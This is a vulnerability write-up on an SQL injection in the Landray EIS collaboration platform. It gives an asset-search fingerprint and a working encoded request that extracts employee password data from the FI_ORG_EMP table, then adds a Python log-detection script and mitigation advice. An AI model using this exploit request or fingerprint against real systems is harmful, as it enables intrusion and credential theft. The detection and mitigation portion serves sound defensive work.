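0x01 Vulnerability Description
Landray EIS Smart Collaboration Platform (蓝凌EIS智慧协同平台) is a product that provides efficient collaborative office work and teamwork for growing enterprises.
The Landray EIS Smart Collaboration Platform has a SQL injection vulnerability that attackers can exploit to obtain sensitive information from the database.
0x02 Asset Discovery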
app="Landray-EIS智慧协同平台"
0x03 Vulnerability Reproduction
GET /third/DingTalk/Pages/DingTalkMessage.aspx?redirectUrl=12&guid=1%27%2B%28SELECT%20CHAR%28107%29%2BCHAR%28108%29%2BCHAR%2877%29%2BCHAR%2868%29%20WHERE%209553%3D9553%20AND%206423%20IN%20%28SELECT%20%28CHAR%28113%29%2BCHAR%28107%29%2BCHAR%28122%29%2BCHAR%28122%29%2BCHAR%28113%29%2B%28SELECT%20ISNULL%28CAST%28COUNT%28pwd%29%20AS%20NVARCHAR%284000%29%29%2CCHAR%2832%29%29%20FROM%20%28SELECT%20pwd%2C%20ROW_NUMBER%28%29%20OVER%20%28ORDER%20BY%20%28SELECT%201%29%29%20AS%20CAP%20FROM%20EIS.dbo.FI_ORG_EMP%29x%20WHERE%20CAP%3D22%29%2BCHAR%28113%29%2BCHAR%28120%29%2BCHAR%28106%29%2BCHAR%28113%29%2BCHAR%28113%29%29%29%29%2B%27 HTTP/1.1
Host:
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.101 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
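
For detection, requests like the one above can be flagged in web-server or WAF logs by validating the guid parameter on this endpoint. The following is an added example, not part of the original write-up or the vendor's code; it assumes a legitimate guid is a plain GUID-like token, and the sample request targets are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Endpoint and parameter name come from the request on this page.
# IIS paths and ASP.NET query keys are case-insensitive, so compare in lower case.
TARGET_PATH = "/third/dingtalk/pages/dingtalkmessage.aspx"
# Assumption: a legitimate guid value is a GUID-like token (hex, dashes, braces).
BENIGN_GUID = re.compile(r"[0-9A-Za-z{}\-]{1,64}")
SQL_TOKENS = re.compile(r"(?i)\b(select|union|cast|char|waitfor|exec|row_number)\b|--|;|'")

# Constructed sample request targets (path plus query string), not real traffic.
SAMPLE_TARGETS = [
    "/third/DingTalk/Pages/DingTalkMessage.aspx?redirectUrl=12&guid=3f2504e0-4f89-11d3-9a0c-0305e82c3301",
    "/third/DingTalk/Pages/DingTalkMessage.aspx?redirectUrl=12&guid=1%27%2B%28SELECT%20CHAR%28107%29%29%2B%27",
    "/THIRD/dingtalk/pages/dingtalkmessage.aspx?GUID=1%2527%252B%2528SELECT%25201%2529",
    "/index.aspx?guid=1%27",
]


def fully_decode(value, max_rounds=3):
    """Undo nested percent-encoding so double-encoded values are still inspected."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def inspect_target(request_target):
    """Return a list of findings for one request target; empty means nothing flagged."""
    parts = urlsplit(request_target)
    if parts.path.lower() != TARGET_PATH:
        return []
    findings = []
    for key, raw in parse_qsl(parts.query, keep_blank_values=True):
        if key.lower() != "guid":
            continue
        value = fully_decode(raw)
        if not BENIGN_GUID.fullmatch(value):
            findings.append("guid is not a plain token")
        if SQL_TOKENS.search(value):
            findings.append("guid contains SQL syntax")
    return findings


if __name__ == "__main__":
    for target in SAMPLE_TARGETS:
        print(inspect_target(target) or "ok", "-", target[:70])
```

The same allow-list check on guid, applied server-side before the value reaches the query, is the corresponding mitigation alongside parameterized queries.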